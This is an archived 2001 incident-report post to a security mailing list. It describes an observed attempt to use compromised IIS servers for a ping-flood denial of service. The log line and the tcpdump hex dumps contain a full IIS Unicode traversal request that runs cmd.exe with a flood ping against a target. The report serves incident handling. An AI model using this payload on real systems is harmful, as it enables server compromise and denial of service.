Okay this is scary. This looks like an attempt to use a CodeRed II infected system to perform a denial of service attack. I don't think I need to stress the severity of this. ==> /var/log/apache/access_log <== [deleted host] - - [07/Aug/2001:17:19:35 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+ping.exe+"-v"+igmp+"-t"+"-l"+65000+[deleted target ip]+"-n"+7000+"-w"+0" 404 - TCPDUMP: ( i have only removed the source, since editing out the target ip would bork the dump...) 17:19:34.539092 xxx.xxx.xxx.3385 > tnt1a-31.flint.corecomm.net.ww w: P [bad tcp cksum 6ca7!] 792933628:792933745(117) ack 3456715952 win 16616 (DF ) (ttl 110, id 7881, len 157) 0x0000 4500 009d 1ec9 4000 6e06 f3dd d519 f9a4 E.....@.n....... 0x0010 d8d6 521f 0d39 0050 2f43 34fc ce09 4cb0 ..R..9.P/C4...L. 0x0020 5018 40e8 4446 0000 4745 5420 2f73 6372 P.@.DF..GET./scr 0x0030 6970 7473 2f2e 2e0c 2e2f 7769 6e6e 742f ipts/..../winnt/ 0x0040 7379 7374 656d 3332 2f63 6d64 2e65 7865 system32/cmd.exe 0x0050 3f2f 632b 7069 6e67 2e65 7865 2b22 2d76 ?/c+ping.exe+"-v 0x0060 222b 6967 6d70 2b22 2d74 222b 222d 6c22 "+igmp+"-t"+"-l" 0x0070 2b36 3530 3030 2b32 3133 2e32 352e 3933 +65000+213.25.93 0x0080 2e31 3230 2b22 2d6e 222b 3730 3030 2b22 .120+"-n"+7000+" 0x0090 2d77 222b 300d 0a0d 0a2b 300d 0a -w"+0....+0.. 17:19:34.539626 unknown ip 0 0x0000 0000 0000 4510 009d 0000 0000 ff06 c196 ....E........... 0x0010 d519 f9a4 d8d6 521f 0d39 0050 fc34 432f ......R..9.P.4C/ 0x0020 fc34 432f 5018 0860 7cff 0000 4745 5420 .4C/P..`|...GET. 0x0030 2f73 6372 6970 7473 2f2e 2e0c 2e2f 7769 /scripts/..../wi 0x0040 6e6e 742f 7379 7374 656d 3332 2f63 6d64 nnt/system32/cmd 0x0050 2e65 7865 3f2f 632b 7069 6e67 2e65 7865 .exe?/c+ping.exe 0x0060 2b22 2d76 222b 6967 6d70 2b22 2d74 222b +"-v"+igmp+"-t"+ 0x0070 222d 6c22 2b36 3530 3030 2b32 3133 2e32 "-l"+65000+213.2 0x0080 352e 3933 2e31 3230 2b22 2d6e 222b 3730 5.93.120+"-n"+70 0x0090 3030 2b22 2d77 222b 300d 0a0d 0a2b 300d 00+"-w"+0....+0. 0x00a0 0a . 17:20:13.919075 xxx.xxx.xxx.xxx.4229 > tnt1a-31.flint.corecomm.net.ww w: P [bad tcp cksum 6ca7!] 841644777:841644894(117) ack 3492756124 win 16616 (DF ) (ttl 110, id 11022, len 157) 0x0000 4500 009d 2b0e 4000 6e06 e798 d519 f9a4 E...+.@.n....... 0x0010 d8d6 521f 1085 0050 322a 7ae9 d02f 3a9c ..R....P2*z../:. 0x0020 5018 40e8 0814 0000 4745 5420 2f73 6372 P.@.....GET./scr 0x0030 6970 7473 2f2e 2e0c 2e2f 7769 6e6e 742f ipts/..../winnt/ 0x0040 7379 7374 656d 3332 2f63 6d64 2e65 7865 system32/cmd.exe 0x0050 3f2f 632b 7069 6e67 2e65 7865 2b22 2d76 ?/c+ping.exe+"-v 0x0060 222b 6967 6d70 2b22 2d74 222b 222d 6c22 "+igmp+"-t"+"-l" 0x0070 2b36 3530 3030 2b32 3133 2e32 352e 3933 +65000+213.25.93 0x0080 2e31 3230 2b22 2d6e 222b 3730 3030 2b22 .120+"-n"+7000+" 0x0090 2d77 222b 300d 0a0d 0a2b 300d 0a -w"+0....+0.. 17:20:13.919639 unknown ip 0 0x0000 0000 0000 4510 009d 0000 0000 ff06 0000 ....E........... 0x0010 d519 f9a4 d8d6 521f 1085 0050 e97a 2a32 ......R....P.z*2 0x0020 e97a 2a32 5018 0860 5422 0000 4745 5420 .z*2P..`T"..GET. 0x0030 2f73 6372 6970 7473 2f2e 2e0c 2e2f 7769 /scripts/..../wi 0x0040 6e6e 742f 7379 7374 656d 3332 2f63 6d64 nnt/system32/cmd 0x0050 2e65 7865 3f2f 632b 7069 6e67 2e65 7865 .exe?/c+ping.exe 0x0060 2b22 2d76 222b 6967 6d70 2b22 2d74 222b +"-v"+igmp+"-t"+ 0x0070 222d 6c22 2b36 3530 3030 2b32 3133 2e32 "-l"+65000+213.2 0x0080 352e 3933 2e31 3230 2b22 2d6e 222b 3730 5.93.120+"-n"+70 0x0090 3030 2b22 2d77 222b 300d 0a0d 0a2b 300d 00+"-w"+0....+0. 0x00a0 0a . As an afterthought, I saw a url driting around, realated to such an idea. http://www.iispacket.com/ , although I am not getting that host to respond. I thinks this needs immediate attention. I can't do it now, i must go to school. -- http://c64.arcsnet.net/ ICQ UIN 1551505 "The things you own, they end up owning you." - Tylder Durden ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Aug 07 2001 - 15:13:36 PDT